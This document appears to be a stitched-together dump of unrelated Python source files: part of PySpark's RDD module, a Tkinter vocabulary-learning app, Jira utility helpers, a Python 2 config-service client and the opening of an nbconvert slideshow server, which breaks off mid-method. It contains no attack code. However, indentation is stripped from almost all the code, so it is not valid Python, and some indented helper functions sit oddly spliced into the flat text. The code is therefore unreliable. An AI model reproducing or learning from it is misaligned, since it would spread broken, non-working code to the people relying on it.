def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
wordi_main.py
|
from tkinter import *
import wordi_functions as f
import goslate
import bing_get as b
import random
from PIL import Image,ImageTk
import time
import queue
import threading
import pickle
import os
from tkinter import ttk, messagebox, filedialog
#GLOBAL VARIABLES
global_path="D:/wordi project"
en=pickle.load( open( "en_dict.p", "rb" ) )
de=pickle.load( open( "de_dict.p", "rb" ) )
newe=pickle.load( open( "newe_dict.p", "rb" ) )
image=""
learndict={}
target_language="cs"
language="en"
counter=0
allwords=[]
a=[]
flip=0
binary=0
begin=0
gs=goslate.Goslate()
saveadjstate=DISABLED
sensaveadjstate=DISABLED
#END OF GLOBAL VARIABLES
#IMPORT,QUIT BLOCK
def clear_pickles():
global en
global de
global newe
en={}
de={}
newe={}
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
return
def places_forget():
logap.place_forget()
internetimage.place_forget()
back.grid_forget()
forth.grid_forget()
sentenci.place_forget()
ask.place_forget()
yes.place_forget()
no.place_forget()
nextsen.place_forget()
translation.place_forget()
adjustentry.place_forget()
saveadjustentry.place_forget()
senadjustentry.place_forget()
savesenadjusted.place_forget()
fin.place_forget()
opentext.place_forget()
createfile.place_forget()
filename.place_forget()
succes.place_forget()
failed.place_forget()
choosebox.place_forget()
learnit.place_forget()
showhide.place_forget()
cor_fal.place_forget()
correct.place_forget()
wrong.place_forget()
nomore.place_forget()
examination.place_forget()
return
def polish_less(listi):
    # Filter in place; removing items while iterating over the same list skips elements.
    listi[:] = [item for item in listi if item not in ("", " ")]
    return listi
def polish(listi):
i=0
j=0
for sen in listi:
if sen==[""]:
listi.remove(sen)
if i>=len(listi):
break
for word in sen:
if j>=len(listi[i]):
break
listi[i][j]=listi[i][j].replace(",","")
listi[i][j]=listi[i][j].replace("1","")
listi[i][j]=listi[i][j].replace("2","")
listi[i][j]=listi[i][j].replace("3","")
listi[i][j]=listi[i][j].replace("4","")
listi[i][j]=listi[i][j].replace("5","")
listi[i][j]=listi[i][j].replace("6","")
listi[i][j]=listi[i][j].replace("7","")
listi[i][j]=listi[i][j].replace("8","")
listi[i][j]=listi[i][j].replace("9","")
listi[i][j]=listi[i][j].replace("0","")
listi[i][j]=listi[i][j].replace(",","")
listi[i][j]=listi[i][j].lower()
if listi[i][j]=="":
listi[i].remove(listi[i][j])
j=j+1
if j>=len(listi[i]):
break
if sen==[""]:
listi.remove(sen)
elif sen==[]:
listi.remove(sen)
i=i+1
j=0
return listi
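# A compact sketch of what polish() above intends (hypothetical helper, not used
# by the GUI): strip digits and commas, lowercase every token, and drop empty
# tokens without mutating the lists while iterating over them.
def polish_clean(sentences):
    import re
    cleaned = []
    for sen in sentences:
        words = [re.sub(r"[0-9,]", "", w).lower() for w in sen]
        words = [w for w in words if w.strip()]
        if words:
            cleaned.append(words)
    return cleaned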
def download():
for sen in allwords:
for word in sen:
if os.path.isfile("D:/wordi project/images/%s"%(word+"1.jpg")):
pass
else:
b.getpic(word)
return
def handle_picture(word):
global finalimage
global image
try:
image=word+str(random.randrange(1,3))+".jpg"
imagepath="D:/wordi project/images/%s"%(image)
finalimage=ImageTk.PhotoImage(Image.open(imagepath))
internetimage.configure(image=finalimage)
except:
print("FAILED")
return
def change_state1(*args):
if adjusted.get()!="":
saveadjustentry.config(state="active")
elif adjusted.get()=="":
saveadjustentry.config(state="disabled")
return
def change_state2(*args):
if senadjusted.get()!="":
savesenadjusted.config(state="active")
elif senadjusted.get()=="":
savesenadjusted.config(state="disabled")
return
def correct_word():
y=adjusted.get()
cell.set(y)
return
def correct_sen():
y=senadjusted.get()
translated.set(y)
return
def change():
global language
if language=="en":
language="de"
else:
language="en"
return
def quiti():
exiti=messagebox.askyesno(title="quit?",message="Are you sure you want to exit Wordi?")
if exiti:
gui.destroy()
return
def openo():
gui.geometry("840x750+100+100")
places_forget()
sentenci.place(x=50,y=100)
ask.place(x=400,y=80)
yes.place(x=50,y=140)
no.place(x=50,y=190)
nextsen.place(x=400,y=250)
translation.place(x=50,y=220)
adjustentry.place(x=50,y=270)
saveadjustentry.place(x=50,y=240)
senadjustentry.place(x=350,y=270)
savesenadjusted.place(x=350,y=240)
internetimage.place(x=0,y=300)
main()
t=threading.Thread(target=download)
progressbar.place(x=100,y=100)
progressbar.start()
progressbar.after(10000, stop_progressbar)
t.start()
#time.sleep(10)
return
def stop_progressbar():
progressbar.stop()
progressbar.place_forget()
initial()
def main():
try:
importopen=filedialog.askopenfile(filetypes=[("Text files","*.txt")])
data=importopen.read()
        global language
        language=gs.detect(data)
c=importi(data)
for sen in a:
allwords.append(sen.split(" "))
polish(allwords)
polish(allwords)
except:
pass
return
def initial():
global flip
global now
try:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
barier(flip,allwords[counter])
sentenci.insert(1.0,a[counter])
now=a[counter].split(" ")
polish_less(now)
translated.set(gs.translate(a[counter],target_language,language))
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
raise
return
def importi(data):
global a
a=data.split(".")
return a
def counting():
global flip
flip=flip+1
return
def check_ifin(word,list1,list2,list3):
if word in list1:
return 1
if word in list2:
return 1
if word in list3:
return 1
return 0
def barier(var,listi):
if var>len(listi)-1:
alghoritm_next()
if counter>len(allwords)-1:
finish()
return
return
def finish():
global en
global de
global newe
global begin
yes.place_forget()
no.place_forget()
nextsen.place_forget()
ask.place_forget()
sentenci.place_forget()
translation.place_forget()
adjustentry.place_forget()
saveadjustentry.place_forget()
senadjustentry.place_forget()
savesenadjusted.place_forget()
logap.place(x=140,y=100)
internetimage.place_forget()
begin=0
fin.place(x=250,y=100)
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
return
def alghoritm_next():
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
global counter
if counter>len(allwords)-1:
finish()
else:
global translated
global flip
global now
global begin
save=open("simpletranslation","a")
save.write(str(translated.get()+"\n"))
save.close()
sentenci.configure(state="normal")
sentenci.delete(1.0,"1.%s"%(len(a[counter])))
counter=counter+1
now=a[counter].split(" ")
polish_less(now)
sentenci.insert(1.0,a[counter])
translated.set(gs.translate(a[counter],target_language,language))
sentenci.tag_delete("mytag")
flip=0
begin=0
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
return
def alghoritm_yes():
barier(flip,allwords[counter])
global cell
global begin
begin=begin+len(allwords[counter][flip])
word=allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language)
if language=="en":
fh=open("word_libraryEN.txt","a")
fh.write(str(cell.get())+"\n")
fh.close()
en[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
if language=="de":
deh=open("word_libraryDE.txt","a")
deh.write(str(cell.get())+"\n")
deh.close()
de[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
counting()
try:
barier(flip,allwords[counter])
if check_ifin(allwords[counter][flip],en,de,newe)==1:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
else:
pass
sentenci.configure(state="normal")
sentenci.tag_delete("mytag")
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
raise#print("END")
return
def alghoritm_no():
barier(flip,allwords[counter])
global cell
global begin
begin=begin+len(allwords[counter][flip])
word=allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language)
new=open("word_libraryNEW.txt","a")
new.write(str(cell.get())+"\n")
new.close()
newe[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
counting()
try:
barier(flip,allwords[counter])
if check_ifin(allwords[counter][flip],en,de,newe)==1:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
else:
pass
sentenci.configure(state="normal")
sentenci.tag_delete("mytag")
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
print("END")
return
#END OF IMPORT,QUIT
#LEARN BLOCK
def learno():
gui.geometry("1000x550+100+100")
places_forget()
choosebox.place(x=840,y=0)
learnit.place(x=840,y=470)
examination.place(x=840,y=520)
detect_file()
logap.place(x=140,y=100)
return
def detect_file():
x=0
for file in os.listdir(global_path):
if ".wordi" in file:
choosebox.insert(x,file)
x=x+1
return
def alghoritm_learn():
global counter
global myvariables
counter=0
ask.place(x=300,y=40)
showhide.place(x=300,y=90)
back.grid(row=1,column=0,sticky=W)
forth.grid(row=1,column=4,sticky=E)
keywords=list(newe.keys())
cor_fal.place(x=300,y=120)
cor_fal.bind("<Return>",checkinput)
global learndict
learndict={}
myvariables=[]
words=[]
logap.place_forget()
file=str(choosebox.get(ACTIVE))
with open(file,"r") as f:
r=f.read()
worde=r.split(".")
for sen in worde:
words.append(sen.split(" "))
polish(words)
f.close()
for sen in words:
for word in sen:
if word in keywords:
learndict[word]=newe[word]
myvariables=list(learndict.keys())
if counter>=len(myvariables):
print("No words")
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
def alghoritm_show():
global binary
if binary==0:
showhide["text"]="Hide answer!"
internetimage.place(x=0,y=200)
translation.place(x=300,y=60)
binary=1
elif binary==1:
showhide["text"]="Show answer!"
internetimage.place_forget()
translation.place_forget()
binary=0
return
def forthin():
global counter
nomore.place_forget()
correct.place_forget()
wrong.place_forget()
counter=counter+1
check_index()
return
def backin():
global counter
nomore.place_forget()
correct.place_forget()
wrong.place_forget()
counter=counter-1
check_index()
return
def checkinput(event):
correct.place_forget()
wrong.place_forget()
if enter.get()==learndict[myvariables[counter]]:
correct.place(x=300,y=250)
else:
wrong.place(x=300,y=250)
return
def check_index():
global counter
if counter>=len(myvariables):
nomore.place(x=300,y=250)
counter=0
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
def exam_me():
global counter
global myvariables
counter=0
ask.place(x=300,y=40)
back.grid(row=1,column=0,sticky=W)
forth.grid(row=1,column=4,sticky=E)
keywords=list(newe.keys())
cor_fal.place(x=300,y=120)
cor_fal.bind("<Return>",checkinput)
global learndict
learndict={}
myvariables=[]
words=[]
logap.place_forget()
file=str(choosebox.get(ACTIVE))
with open(file,"r") as f:
r=f.read()
worde=r.split(".")
for sen in worde:
words.append(sen.split(" "))
polish(words)
f.close()
for sen in words:
for word in sen:
if word in keywords:
learndict[word]=newe[word]
myvariables=list(learndict.keys())
if counter>=len(myvariables):
print("No words")
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
#END OF LEARN BLOCK
#OPEN BLOCK
def textigui():
places_forget()
opentext.place(x=0,y=30)
createfile.place(x=0,y=30)
filename.place(x=150,y=30)
return
def create_wordi():
alltext=str(opentext.get("1.0",'end-1c'))
name=str(named.get())+".wordi.txt"
file = open(name,'a')
file.write(alltext)
file.close()
if os.path.isfile(name):
succes.place(x=200,y=200)
else:
failed.place(x=200,y=200)
return
#END OF OPEN BLOCK
#GUI BLOCK
gui=Tk()
gui.title("Wordi")
gui.geometry("840x550+100+100")
gui.configure(background="white")
wmenu=Menu(gui)
wordimenu=Menu(wmenu, tearoff=0)
wordimenu.add_command(label="learn",command=learno)
wordimenu.add_command(label="import",command=openo)
wordimenu.add_command(label="open",command=textigui)
wordimenu.add_checkbutton(label="deutsch",command=change)
wordimenu.add_command(label="configure",command=f.a)
wmenu.add_cascade(label="Wordi",menu=wordimenu)
wmenu.add_command(label="Stacistics",command=f.a)
aboutmenu=Menu(wmenu, tearoff=0)
aboutmenu.add_command(label="This program",command=f.a)
aboutmenu.add_command(label="About me",command=f.a)
wmenu.add_cascade(label="About", menu=aboutmenu)
wmenu.add_command(label="Help",command=f.a)
wmenu.add_command(label="Quit",command=quiti)
gui.configure(menu=wmenu)
forthi=PhotoImage(file="forth.gif")
backi=PhotoImage(file="back.gif")
textversion=PhotoImage(file="textv.gif")
movieversion=PhotoImage(file="moviev.gif")
importphoto=PhotoImage(file="import_button.gif")
backgroundi=PhotoImage(file="background.gif")
learnphoto=PhotoImage(file="learn_button.gif")
openphoto=PhotoImage(file="open_button.gif")
configurephoto=PhotoImage(file="configure_button.gif")
logo=PhotoImage(file="Wordilogo.gif")
languagephoto=PhotoImage(file="language_button.gif")
background_label=Label(gui,image=backgroundi)
back=Button(gui,image=backi,command=backin,bd=0)#.grid(row=0,column=0)
forth=Button(gui,image=forthi,command=forthin,bd=0)#.grid(row=0,column=1)
textv=Button(gui, image=textversion, command=f.a)#.grid(row=0,column=3,sticky=N)
moviev=Button(gui,image=movieversion, command=f.a)#.grid(row=0,column=5,sticky=N)
import_button=Button(gui,image=importphoto,command=openo,bd=0)
open_button=Button(gui,image=openphoto,bd=0,command=textigui)
learn_button=Button(gui,image=learnphoto,bd=0,command=learno)
configure_button=Button(gui,image=configurephoto,bd=0,command=f.a)
language_button=Button(gui,image=languagephoto,bd=0,command=f.a)
logap=Label(gui,image=logo, bg="#1f1f1f",padx=10,pady=10)
background_label.place(x=0,y=0)
open_button.grid(row=0,column=0)
import_button.grid(row=0,column=1)
logap.place(x=140,y=100)
learn_button.grid(row=0,column=2)
configure_button.grid(row=0,column=3)
language_button.grid(row=0,column=4)
translated=StringVar()
cell=StringVar()
adjusted=StringVar()
senadjusted=StringVar()
named=StringVar()
showor=StringVar()
enter=StringVar()
adjusted.trace("w",change_state1)
senadjusted.trace("w",change_state2)
finalimage=ImageTk.PhotoImage(Image.open(global_path+"/Wordilogo.gif"))
sentenci=Text(gui,bg="#1f1f1f",font=("Times", 10, "bold"),fg="white",height=1,width=170)
sentenci.configure(relief=FLAT)
ask=Label(gui,textvariable=cell,bg="#1f1f1f",font=("Times", 14, "bold"),fg="red")
yes=Button(gui,text="YES",command=alghoritm_yes)
no=Button(gui,text="NO",command=alghoritm_no)
nextsen=Button(gui,text="SAVE IT",command=alghoritm_next)
translation=Label(gui,textvariable=translated,bg="#1f1f1f",font=("Times", 10, "bold"),fg="white")
adjustentry=Entry(gui,textvariable=adjusted)
saveadjustentry=Button(gui,text="Correct word translation",command=correct_word,state=saveadjstate)
senadjustentry=Entry(gui,textvariable=senadjusted)
savesenadjusted=Button(gui,text="Correct sentence translation",command=correct_sen,state=sensaveadjstate)
internetimage=Label(gui,image=finalimage,bg="#1f1f1f",width=840,height=500)
fin=Label(gui,text="All words have been imported!",bg="#1f1f1f",font=("Times", 10, "bold"))
opentext=Text(gui,bg="white",width=84,height=150)
createfile=Button(gui,command=create_wordi,text="Create wordi file",font=("Times", 10, "bold"))
filename=Entry(gui,textvariable=named,bg="grey",fg="green")
succes=Label(gui,text="File was succesfuly created!",font=("Times", 20, "bold"),fg="black",bg="white")
failed=Label(gui,text="Failed to create file!(see help)",font=("Times", 20, "bold"),fg="black",bg="white")
choosebox=Listbox(gui,width=50,height=23,font=("Times", 10, "bold"))
learnit=Button(gui,text="Learn!",font=("Times", 12, "bold"),fg="blue",bg="grey",command=alghoritm_learn)
showhide=Button(gui,text="Show answer!",font=("Times", 10, "bold"),command=alghoritm_show)
cor_fal=Entry(gui,textvariable=enter,bg="white",fg="blue")
correct=Label(gui,text="Correct!",font=("Times", 12, "bold"),fg="green")
wrong=Label(gui,text="Wrong!",font=("Times", 12, "bold"),fg="red")
nomore=Label(gui,text="No more words to learn!",font=("Times", 12, "bold"),fg="green",bg="grey")
examination=Button(gui,text="Test",font=("Times", 12, "bold"),fg="blue",bg="grey",command=exam_me)
progressbar=ttk.Progressbar(orient=HORIZONTAL, length=600, mode='determinate')
#END OF GUI BLOCK
gui.mainloop()
|
__init__.py
|
"""Jira utils used internally."""
import threading
import warnings
from typing import Any, Optional, cast
from requests import Response
from requests.structures import CaseInsensitiveDict as _CaseInsensitiveDict
from jira.resilientsession import raise_on_error
class CaseInsensitiveDict(_CaseInsensitiveDict):
"""A case-insensitive ``dict``-like object.
DEPRECATED: use requests.structures.CaseInsensitiveDict directly.
Implements all methods and operations of
``collections.MutableMapping`` as well as dict's ``copy``. Also
provides ``lower_items``.
All keys are expected to be strings. The structure remembers the
case of the last key to be set, and ``iter(instance)``,
``keys()``, ``items()``, ``iterkeys()``
will contain case-sensitive keys. However, querying and contains
testing is case insensitive::
cid = CaseInsensitiveDict()
cid['Accept'] = 'application/json'
cid['accept'] == 'application/json' # True
list(cid) == ['Accept'] # True
For example, ``headers['content-encoding']`` will return the
value of a ``'Content-Encoding'`` response header, regardless
of how the header name was originally stored.
If the constructor, ``.update``, or equality comparison
operations are given keys that have equal ``.lower()`` s, the
behavior is undefined.
"""
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"Use requests.structures.CaseInsensitiveDict directly", DeprecationWarning
)
super().__init__(*args, **kwargs)
def threaded_requests(requests):
for fn, url, request_args in requests:
th = threading.Thread(target=fn, args=(url,), kwargs=request_args, name=url)
th.start()
for th in threading.enumerate():
if th.name.startswith("http"):
th.join()
def json_loads(resp: Optional[Response]) -> Any:
"""Attempts to load json the result of a response
Args:
resp (Optional[Response]): The Response object
Raises:
JIRAError: via :py:func:`jira.resilientsession.raise_on_error`
Returns:
Union[List[Dict[str, Any]], Dict[str, Any]]: the json
"""
raise_on_error(resp) # if 'resp' is None, will raise an error here
resp = cast(Response, resp) # tell mypy only Response-like are here
try:
return resp.json()
except ValueError:
# json.loads() fails with empty bodies
if not resp.text:
return {}
raise
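# Minimal usage sketch for json_loads() (illustrative only, never called from this
# package; the URL below is hypothetical).
def _json_loads_example():
    import requests
    resp = requests.get("https://jira.example.com/rest/api/2/serverInfo")
    return json_loads(resp)  # {} on an empty body; raises JIRAError on HTTP errors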
|
client.py
|
import os
import json
import threading
import requests
import time
from collections import deque
import version
class Item:
def __init__(self, org, proj, name, value, token, version, gray, timeout):
self._org = org
self._proj = proj
self._name = name
self._value = value
self._token = token
self._version = version
self._gray = gray
self._timeout = time.time() + timeout
def __str__(self):
t = {}
t['org'] = self._org
t['proj'] = self._proj
t['name'] = self._name
t['value'] = self._value
t['token'] = self._token
t['version'] = self._version
t['gray'] = self._gray
t['timeout'] = self._timeout
return json.dumps(t)
__repr__ = __str__
def rid(self):
return self._org + "." + self._proj + "." + self._name
def org(self):
return self._org
def proj(self):
return self._proj
def name(self):
return self._name
def token(self):
return self._token
def version(self):
return self._version
def value(self):
return self._value
def gray(self):
return self._gray
def timeout(self):
return self._timeout
def set_expired(self, timeout):
self._timeout = timeout
def expired(self):
return self._timeout <= time.time()
class Cache:
def __init__(self, async=False):
self._cache = {}
self._timeouts = []
self._lock = threading.Lock()
self._async = async
def get(self, key):
with self._lock:
if self._cache.has_key(key):
return self._cache[key]
return None
def set(self, key, item):
with self._lock:
self._cache[key] = item
if self._async:
self._timeouts.append((key, item.timeout()))
def remove(self, key):
with self._lock:
if self._cache.has_key(key):
del self._cache[key]
def refresh(self, key, timeout):
expired = time.time() + timeout
with self._lock:
if self._cache.has_key(key):
self._cache[key].set_expired(expired)
if self._async:
self._timeouts.append((key, expired))
def get_update_items(self):
t = []
with self._lock:
t.extend(self._timeouts)
self._timeouts = []
return t
def gen_cache_id(rid, token, gray):
if token != None:
rid = rid + ":" + token
if gray:
rid = rid + ":true"
return rid
class Result(object):
def __init__(self, code=-1, version="-1", content=None):
self._code = code
self._version = version
self._content = content
def __str__(self):
t = {}
t['code'] = self._code
t['version'] = self._version
t['content'] = self._content
return json.dumps(t)
__repr__ = __str__
def set_code(self, code):
self._code = code
def set_version(self, version):
self._version = version
def set_content(self, content):
self._content = content
def ok(self):
return self._code == 200
def code(self):
return self._code
def version(self):
return self._version
def content(self):
return self._content
class Client(object):
__instance_lock = threading.Lock()
__instance = None
def __init__(self, address, timeout=1, auto_refresh=False, refresh_interval=10):
self._callbacks = {}
self._callbacks_lock = threading.Lock()
self._address = address
if not self._address.endswith("/"):
self._address = self._address + "/api/puller/"
else:
self._address = self._address + "api/puller/"
self._timeout = timeout
self._cache = Cache(auto_refresh)
self._role = "client"
self._refresh_interval = refresh_interval
self._auto_refresh = auto_refresh
self._printer = None
if auto_refresh:
background = threading.Thread(target=self._bgwork)
background.setName("guldan-bg")
background.setDaemon(True)
self._background = background
background.start()
@classmethod
def instance(cls, address, timeout=1, auto_refresh=False):
if not cls.__instance:
with cls.__instance_lock:
if not cls.__instance:
cls.__instance = cls(address, timeout, auto_refresh)
return cls.__instance
def _get_callback(self, cache_id):
with self._callbacks_lock:
if self._callbacks.has_key(cache_id):
return self._callbacks[cache_id]
return None
def subscribe(self, rid, callback, token=None, gray=False):
with self._callbacks_lock:
self._callbacks[gen_cache_id(rid, token, gray)] = callback
def _bgwork(self):
while True:
time.sleep(self._refresh_interval)
expires = self._cache.get_update_items()
if len(expires) > 0:
idx = 0
while idx < len(expires):
while idx < len(expires):
expire = expires[idx]
if expire[1] > time.time():
break
cache_id = expire[0]
local_item = self._cache.get(cache_id)
if local_item == None:
idx = idx + 1
continue
result = self._get_config_from_remote(local_item.org(), local_item.proj(),
local_item.name(), local_item.token(), local_item.version(), local_item.gray())
code = result.code()
if code == 200:
if local_item == None or local_item.version() != result.version():
if self._try_do_callback(cache_id, result):
item = Item(local_item.org(), local_item.proj(), local_item.name(),
result.content(), local_item.token(), result.version(), local_item.gray(), self._refresh_interval)
self._cache.set(cache_id, item)
else:
self._cache.refresh(cache_id, self._refresh_interval)
elif code == 404 or code == 403:
if self._try_do_callback(cache_id, result):
self._cache.remove(cache_id)
else:
self._cache.refresh(cache_id, self._refresh_interval)
idx = idx + 1
time.sleep(self._refresh_interval)
def _try_do_callback(self, cache_id, result):
callback = self._get_callback(cache_id)
if callback != None and callback(cache_id, result) == False:
self._cache.refresh(cache_id, self._refresh_interval)
return False
return True
def _get_config_from_remote(self, org, proj, name, token, local_version, gray):
result = Result()
payload = {}
payload["grey"] = gray
payload["cver"] = "python"+version.__version__
payload["ctype"] = self._role
payload["lver"] = local_version
payload["cid"] = os.getpid()
headers = None
if token != None:
headers = {"X-Guldan-Token": token}
        address = self._address + org + "/" + proj + "/" + name
        try:
            r = requests.get(address, params=payload, timeout=self._timeout, headers=headers)
if r.status_code == requests.codes.ok:
result.set_code(r.status_code)
result.set_version(r.headers["X-Guldan-Version"])
result.set_content(r.text)
elif r.status_code == 404 or r.status_code == 403:
result.set_code(r.status_code)
else:
if self._printer:
self._printer("request %s got error code %d" % (address, r.status_code))
except Exception, e:
if self._printer:
self._printer("request %s got error %s" % str(e))
return result
def get_config(self, rid, token=None, gray=False):
slices = None
try:
slices = rid.split(".")
if len(slices) != 3:
raise ValueError("rid:" + rid + " is invalid format")
except AttributeError:
raise ValueError("rid is invalid type")
cache_id = gen_cache_id(rid, token, gray)
local_item = self._cache.get(cache_id)
if local_item != None and (self._auto_refresh or local_item.expired() == False):
return Result(200, local_item.version(), local_item.value())
v = "-1"
if local_item != None:
v = local_item.version()
result = self._get_config_from_remote(slices[0], slices[1], slices[2], token, v, gray)
code = result.code()
if code == 200:
if local_item == None or local_item.version() != result.version():
item = Item(slices[0], slices[1], slices[2], result.content(), token, result.version(), gray, self._refresh_interval)
self._cache.set(cache_id, item)
else:
self._cache.refresh(cache_id, self._refresh_interval)
elif code == 404 or code == 403:
self._cache.remove(cache_id)
return result
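# Minimal usage sketch (illustrative only, never called): the service address and
# the "org.proj.item" resource id below are hypothetical.
def _client_usage_example():
    client = Client.instance("http://guldan.example.com", timeout=1, auto_refresh=True)
    result = client.get_config("myorg.myproj.myitem", token=None, gray=False)
    if result.ok():
        print("version %s: %s" % (result.version(), result.content()))
    return result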
|
serve.py
|
"""PostProcessor for serving reveal.js HTML slideshows."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import os
import webbrowser
import threading
from tornado import web, ioloop, httpserver, log
from tornado.httpclient import AsyncHTTPClient
from traitlets import Bool, Unicode, Int
from .base import PostProcessorBase
class ProxyHandler(web.RequestHandler):
"""handler the proxies requests from a local prefix to a CDN"""
@web.asynchronous
def get(self, prefix, url):
"""proxy a request to a CDN"""
proxy_url = "/".join([self.settings['cdn'], url])
client = self.settings['client']
client.fetch(proxy_url, callback=self.finish_get)
def finish_get(self, response):
"""finish the request"""
# rethrow errors
response.rethrow()
for header in ["Content-Type", "Cache-Control", "Date", "Last-Modified", "Expires"]:
if header in response.headers:
self.set_header(header, response.headers[header])
self.finish(response.body)
class ServePostProcessor(PostProcessorBase):
"""Post processor designed to serve files
Proxies reveal.js requests to a CDN if no local reveal.js is present
"""
open_in_browser = Bool(True,
help="""Should the browser be opened automatically?"""
).tag(config=True)
browser = Unicode(u'',
help="""Specify what browser should be used to open slides. See
https://docs.python.org/3/library/webbrowser.html#webbrowser.register
to see how keys are mapped to browser executables. If
not specified, the default browser will be determined
by the `webbrowser`
standard library module, which allows setting of the BROWSER
environment variable to override it.
""").tag(config=True)
reveal_cdn = Unicode("https://cdnjs.cloudflare.com/ajax/libs/reveal.js/3.5.0",
help="""URL for reveal.js CDN.""").tag(config=True)
reveal_prefix = Unicode("reveal.js",
help="URL prefix for reveal.js").tag(config=True)
ip = Unicode("127.0.0.1",
help="The IP address to listen on.").tag(config=True)
port = Int(8000, help="port for the server to listen on.").tag(config=True)
def postprocess(self, input):
"""Serve the build directory with a webserver."""
dirname, filename = os.path.split(input)
handlers = [
(r"/(.+)", web.StaticFileHandler, {'path' : dirname}),
(r"/", web.RedirectHandler, {"url": "/%s" % filename})
]
if ('://' in self.reveal_prefix or self.reveal_prefix.startswith("//")):
# reveal specifically from CDN, nothing to do
pass
